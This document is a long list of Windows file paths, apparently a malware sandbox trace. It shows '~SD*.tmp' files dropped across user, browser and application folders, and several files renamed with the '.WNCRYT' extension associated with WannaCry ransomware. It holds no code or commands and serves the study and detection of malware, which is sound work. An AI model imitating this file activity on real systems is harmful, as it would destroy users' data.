C:\Users\All Users\Package Cache\{E663ED1E-899C-40E8-91D0-8D37B95E3C69}v40.68.31213\~SDB53B.tmp
C:\Users\All Users\Package Cache\{E8900394-218B-459F-98DC-75B0FD88CC80}v3.8.10150.0\~SDB58A.tmp
C:\Users\All Users\Package Cache\{EFDAD3B5-AE93-48A4-BE3E-40EEFC4F100A}v3.8.10150.0\~SDB5BA.tmp
C:\Users\All Users\Package Cache\{efe3bb1e-6444-4bc0-9edd-7e5bae77965b}\~SDB5DA.tmp
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\~SDB639.tmp
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\~SDB659.tmp
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\vcRuntimeAdditional_amd64\~SDB689.tmp
C:\Users\All Users\Package Cache\{F51469FB-F088-479B-BD5A-70A9C557FE6F}v3.8.10150.0\~SDB6C8.tmp
C:\Users\All Users\regid.1991-06.com.microsoft\~SDB727.tmp
C:\Users\All Users\shimgen\~SDB795.tmp
C:\Users\All Users\shimgen\generatedfiles\~SDB7D5.tmp
C:\Users\Default\~SDB7F5.tmp
C:\Users\Default\AppData\~SDB825.tmp
C:\Users\Default\AppData\Local\~SDB836.tmp
C:\Users\Default\AppData\Local\Microsoft\~SDB865.tmp
C:\Users\Default\AppData\Local\Microsoft\Windows\~SDB8A5.tmp
C:\Users\Default\AppData\Local\Microsoft\Windows\GameExplorer\~SDB8E4.tmp
C:\Users\Default\AppData\Local\Microsoft\Windows\History\~SDB905.tmp
C:\Users\Default\AppData\Roaming\~SDB915.tmp
C:\Users\Default\AppData\Roaming\Media Center Programs\~SDB955.tmp
C:\Users\Default\AppData\Roaming\Microsoft\~SDB985.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\~SDB9A5.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SDB9D5.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\~SDBA14.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\~SDBA35.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SDBA64.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SDBA94.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\~SDBAB5.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\~SDBAE4.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\~SDBB14.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SDBB54.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SDBBD2.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDBBF2.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDBC22.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDBC52.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\~SDBC53.tmp
C:\Users\Default\Desktop\~SDBC54.tmp
C:\Users\Default\Documents\~SDBC55.tmp
C:\Users\Default\Downloads\~SDBC56.tmp
C:\Users\Default\Favorites\~SDBC57.tmp
C:\Users\Default\Links\~SDBC58.tmp
C:\Users\Default\Music\~SDBC59.tmp
C:\Users\Default\Pictures\~SDBC5A.tmp
C:\Users\Default\Saved Games\~SDBC6A.tmp
C:\Users\Default\Videos\~SDBC6B.tmp
C:\Users\Public\~SDBC6C.tmp
C:\Users\Public\Desktop\~SDBC6D.tmp
C:\Users\Public\Documents\~SDBC6E.tmp
C:\Users\Public\Downloads\~SDBCCD.tmp
C:\Users\Public\Favorites\~SDBCFD.tmp
C:\Users\Public\Libraries\~SDBD1D.tmp
C:\Users\Public\Music\~SDBD5D.tmp
C:\Users\Public\Music\Sample Music\~SDBDBC.tmp
C:\Users\Public\Pictures\~SDBE1A.tmp
C:\Users\Public\Pictures\Sample Pictures\~SDBE89.tmp
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
C:\Users\Public\Recorded TV\~SDC05E.tmp
C:\Users\Public\Recorded TV\Sample Media\~SDC0AE.tmp
C:\Users\Public\Videos\~SDC0DD.tmp
C:\Users\Public\Videos\Sample Videos\~SDC0EE.tmp
C:\Users\user\~SDC0EF.tmp
C:\Users\user\.ms-ad\~SDC0F0.tmp
C:\Users\user\AppData\~SDC0F1.tmp
C:\Users\user\AppData\Local\~SDC0F2.tmp
C:\Users\user\AppData\Local\Adobe\~SDC103.tmp
C:\Users\user\AppData\Local\Adobe\Acrobat\~SDC104.tmp
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SDC105.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\~SDC106.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\~SDC116.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\~SDC117.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\~SDC176.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\~SDC1B6.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\fb9136c9-56b8-4a66-aca4-73cc2fd2f175\~SDC214.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\~SDC263.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\~SDC293.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\~SDC2D3.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\~SDC312.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\~SDC342.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\~SDC391.tmp
C:\Users\user\AppData\Local\Adobe\ARM\~SDC3D1.tmp
C:\Users\user\AppData\Local\Adobe\ARM\S\~SDC3F1.tmp
C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SDC450.tmp
C:\Users\user\AppData\Local\Adobe\Color\~SDC49F.tmp
C:\Users\user\AppData\Local\Apps\~SDC51D.tmp
C:\Users\user\AppData\Local\Apps\2.0\~SDC54D.tmp
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\~SDC56D.tmp
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\~SDC5BC.tmp
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\manifests\~SDC5EC.tmp
C:\Users\user\AppData\Local\Apps\2.0\Data\~SDC60C.tmp
C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\~SDC66B.tmp
C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\M3VCAP6Z.25X\~SDC6AB.tmp
C:\Users\user\AppData\Local\Boxstarter\~SDC6DA.tmp
C:\Users\user\AppData\Local\CEF\~SDC72A.tmp
C:\Users\user\AppData\Local\CEF\User Data\~SDC769.tmp
C:\Users\user\AppData\Local\CEF\User Data\Dictionaries\~SDC799.tmp
C:\Users\user\AppData\Local\Deployment\~SDC7D8.tmp
C:\Users\user\AppData\Local\Google\~SDC828.tmp
C:\Users\user\AppData\Local\Google\Chrome\~SDC867.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\~SDC8C6.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates\~SDC8D6.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\~SDC8D7.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\~SDC8D8.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\~SDC8D9.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\~SDC8DA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\~SDC8DB.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\~SDC8EC.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\~SDC95A.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\~SDC9AA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\~SDCA08.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\~SDCA57.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\44191681-e6d2-41ed-948c-a2cdae484e83\~SDCAC6.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\~SDCB34.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\~SDCBA3.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\~SDCBE2.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\~SDCC22.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\~SDCC32.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\~SDCC33.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\~SDCC34.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\~SDCC35.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\~SDCC36.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\~SDCC66.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\~SDCC96.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\~SDCCD5.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\~SDCD34.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\~SDCD74.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\~SDCDB3.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\~SDCE02.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\~SDCE51.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDCE91.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\~SDCEB1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\~SDCEE1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\~SDCF01.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\~SDCF22.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\~SDCF71.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\~SDCF91.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\~SDCFB1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\~SDCFE1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\~SDD04F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\~SDD09F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\~SDD0DE.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\~SDD10E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\~SDD14D.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\~SDD16E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\~SDD1AD.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\~SDD1ED.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\~SDD23C.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\~SDD25C.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\~SDD29C.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\~SDD2CB.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\~SDD2EC.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\~SDD32B.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\~SDD37A.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\~SDD3AA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\~SDD3EA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\~SDD41A.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data\~SDD459.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\~SDD489.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\~SDD4C8.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints\~SDD4F8.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\~SDD4F9.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata\~SDD4FA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\~SDD4FB.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved\~SDD4FC.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\~SDD50D.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\~SDD50E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\~SDD54D.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\~SDD55E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\~SDD57E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\~SDD59F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\~SDD5BF.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\~SDD5EF.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\UrlParamClassifications\~SDD61F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm\~SDD65E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\~SDD69E.tmp
C:\Users\user\AppData\Local\Microsoft\~SDD6DD.tmp
C:\Users\user\AppData\Local\Microsoft\Credentials\~SDD70D.tmp
C:\Users\user\AppData\Local\Microsoft\Device Metadata\~SDD73D.tmp
C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\~SDD77C.tmp
C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads\~SDD78D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\~SDD7AD.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\~SDD7CD.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\~SDD7EE.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\~SDD81E.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\~SDD87C.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\~SDD8BC.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\~SDD90B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\~SDD979.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\~SDD9D8.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6af35b70-7d44-4f46-9acd-3b4fa9cd6081\~SDDA27.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\~SDDA67.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\~SDDAA6.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\~SDDAA7.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\~SDDAC7.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\~SDDAD8.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\~SDDAE9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\~SDDAF9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\~SDDB1A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\~SDDB2A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\~SDDB2B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\~SDDB3C.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDDB8B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\~SDDBDA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\~SDDC29.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed\~SDDC49.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\~SDDC5A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\~SDDC9A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\~SDDCD9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\~SDDCF9.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Platform Notifications\~SDDD39.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\~SDDD59.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\~SDDDB8.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\~SDDE07.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\~SDDE56.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\~SDDE76.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\~SDDEA6.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\~SDDEE6.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\~SDDF35.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\~SDDF84.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\~SDDFD3.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\~SDE022.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\~SDE081.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\~SDE0A1.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\~SDE0E1.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\~SDE101.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\~SDE150.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Platform Notifications\~SDE1CE.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\~SDE21D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\~SDE24D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\~SDE26D.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FontLookupTableCache\~SDE2BC.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PepperFlash\~SDE2FC.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\~SDE36A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\~SDE39A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\~SDE3DA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\~SDE3EA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\~SDE40B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\~SDE42B.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\~SDE46A.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\~SDE4AA.tmp
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\~SDE4DA.tmp
C:\Users\user\AppData\Local\Microsoft\Event Viewer\~SDE529.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\~SDE578.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\Feeds for United States~\~SDE5D7.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\~SDE626.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\~SDE646.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\~SDE6B4.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\BD5QM5PR\~SDE6F4.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\S0OSSLWD\~SDE733.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\SQ4TDUZM\~SDE773.tmp
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\ZLFI91IZ\~SDE7A3.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\~SDE7D3.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\~SDE822.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\~SDE871.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\3HLJ65W4\~SDE8B0.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\D3CVYKUR\~SDE8D1.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DGF898HW\~SDE8F1.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DRJ7CCJA\~SDE8F2.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\~SDE8F3.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieUserList\~SDE932.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EUPP\~SDE982.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\~SDE9E0.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\~SDEA2F.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\l51tpzc\~SDEA40.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\rs8lb9c\~SDEA60.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\~SDEABF.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\~SDEAFF.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\~SDEB2E.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\~SDEB4F.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\TabRoaming\~SDEB5F.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\~SDEB60.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\~SDEB71.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\~SDEB72.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\~SDEB73.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\~SDEB74.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\~SDEBB3.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\~SDEBE3.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\~SDEBF4.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000C0CE\~SDEC24.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache\~SDEC44.tmp
C:\Users\user\AppData\Local\Microsoft\Office\~SDEC74.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\~SDECB3.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\~SDED03.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\~SDED32.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\binaries.templates.cdn.office.net\~SDED62.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\cdn.odc.officeapps.live.com\~SDEDD1.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\office15client.microsoft.com\~SDEDD2.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\~SDEDD3.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\~SDEDD4.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\~SDEDD5.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\AppCommands\~SDEDE5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\~SDEDE6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\~SDEDE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\af\~SDEDF8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\am-et\~SDEDF9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64\~SDEDFA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ar\~SDEDFB.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\as-in\~SDEDFC.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\az-latn-az\~SDEDFD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\be\~SDEDFE.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bg\~SDEE1E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-bd\~SDEE4E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-in\~SDEE7E.tmp
